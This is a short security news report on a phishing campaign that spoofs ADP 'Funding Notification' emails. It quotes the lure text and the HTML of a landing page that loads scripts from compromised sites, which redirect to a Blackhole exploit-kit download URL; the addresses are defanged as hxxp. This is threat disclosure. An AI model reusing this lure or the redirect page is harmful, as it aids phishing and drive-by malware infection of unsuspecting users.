Researchers at MX Lab , has intercepted some emails with the subject “ADP Funding Notification – Debit Draft” that lead to a malicious web site with obfuscated Javascript code.
The email is send from the spoofed address “ADP_FSA_Services@ADP.com” or “ADPClientServices@adp.com” and has the following body:
Your Transaction Report(s) have been uploaded to the web site:
The URL will not lead you to the site that is mentioned but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html where the following HTML code is executed:
https://www.flexdirect.adp.com/client/login.aspx
Please note that your bank account will be debited within one banking
business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any
questions or comments, please Contact your ADP Benefits Specialist.
Thank You,
ADP Benefit Services
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js”></script>
<script type=”text/javascript” src=”hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js”></script>
</html>
Both embedded Javascript URLs will redirect you document.location=’hxxp://173.255.228.171/getfile.php?u=853fda24′; The above page contains an obfuscated javascript.
![](https://pinterest.com/pin/create/bookmarklet/?media=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0ltE48vPcebS02EAKSnhya165KBB2vdi6makg34CTMwyEPWX09_MuGCwsZHnKTUafhOcSqknY_qm2YhIj2T5Y2BeAhLbzfnBHmIqIRb8TurTCLXmlg9oCu652oU9nvwW3MDgzkRY3xfs/s1600/Blackhole-exploit-pack.jpg&url=https://www.cysecurity.news/2012/06/emails-with-subject-adp-funding.html&description=Emails with Subject "ADP Funding Notification – Debit Draft" leads to Exploits){kind=link}